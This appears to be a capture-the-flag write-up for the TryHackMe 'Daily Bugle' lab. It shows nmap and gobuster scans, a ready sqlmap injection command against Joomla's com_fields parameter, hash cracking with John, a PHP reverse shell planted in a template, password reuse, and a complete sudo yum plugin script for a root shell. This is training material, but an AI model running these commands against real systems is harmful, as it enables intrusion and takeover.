WriteUp — THM Daily Bugle

Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.

This is a writeup for TryHackMe room Daily Bugle.

Photo by Md Mahdi on Unsplash

Looking at the website we see that it’s a Joomla powered website hosting a blog:

Let’s run a nmap scan to get a feeling of the services:

nmap -sC -sV 10.10.27.244
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 18:09 EET
Nmap scan report for 10.10.27.244
Host is up (0.058s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open  mysql   MariaDB (unauthorized)

Based on this it’s best to focus on the web server. Enumerating the server with gobuster reveals interesting directories:

gobuster -q -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -u http://10.10.45.163 -x txt,php dir
/images (Status: 301)
/media (Status: 301)
/templates (Status: 301)
/index.php (Status: 200)
/modules (Status: 301)
/bin (Status: 301)
/plugins (Status: 301)
/includes (Status: 301)
/language (Status: 301)
/README.txt (Status: 200)
/components (Status: 301)
/cache (Status: 301)
/libraries (Status: 301)
/robots.txt (Status: 200)
/tmp (Status: 301)
/LICENSE.txt (Status: 200)
/layouts (Status: 301)
/administrator (Status: 301)
/configuration.php (Status: 200)
/htaccess.txt (Status: 200)
/cli (Status: 301)

Navigation to the /administrator site reveals Joomla login. By looking at the task description we know that the version on the server is vulnerable so look from exploit-db for suitable vulnerabilities. This one seems to fit:

Offensive Security's Exploit Database Archive

Based on this exploit let’s dump Joomla users:

sqlmap -u "http://10.10.38.215/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomla -T fb9j5_users -dump

Only one superuser “jonah”. Dump the hash to a file and use JohnTheRipper to crack it.

sudo john — wordlist=/usr/share/wordlists/rockyou.txt hash 1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
__REDACTED__ (jonah)

Let’s first check if we can login with SSH. No. Login with Joomla administrator console and hack the template index.php to include php-reverse-shell. (Would be better to add a custom page so that reverse shell wouldn’t block regular use).

Now we can pop a shell as apache user. Upgrade TTY using Python:

python -c 'import pty; pty.spawn("/bin/bash")'

Enumerate the server with linPEAS. Nothing immediately interesting.

Joomla config has mysql config:

public $user = ‘root’;
public $password = ‘__REDACTED__’;

Could it be jjameson password too?

su - jjameson

Yes it is. grab the flag. And SSH in as jjameson for better terminal.

Privilege escalation

There were no immediate PE vectors from linPEAS scan so let’s see if jjameson can do something as super user:

sudo -l
User jjameson may run the following commands on dailybugle:
 (ALL) NOPASSWD: /usr/bin/yum

Ok, for sudo exploits head to GTFOBins and check an exploit for yum:

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y

BOOM! we are root.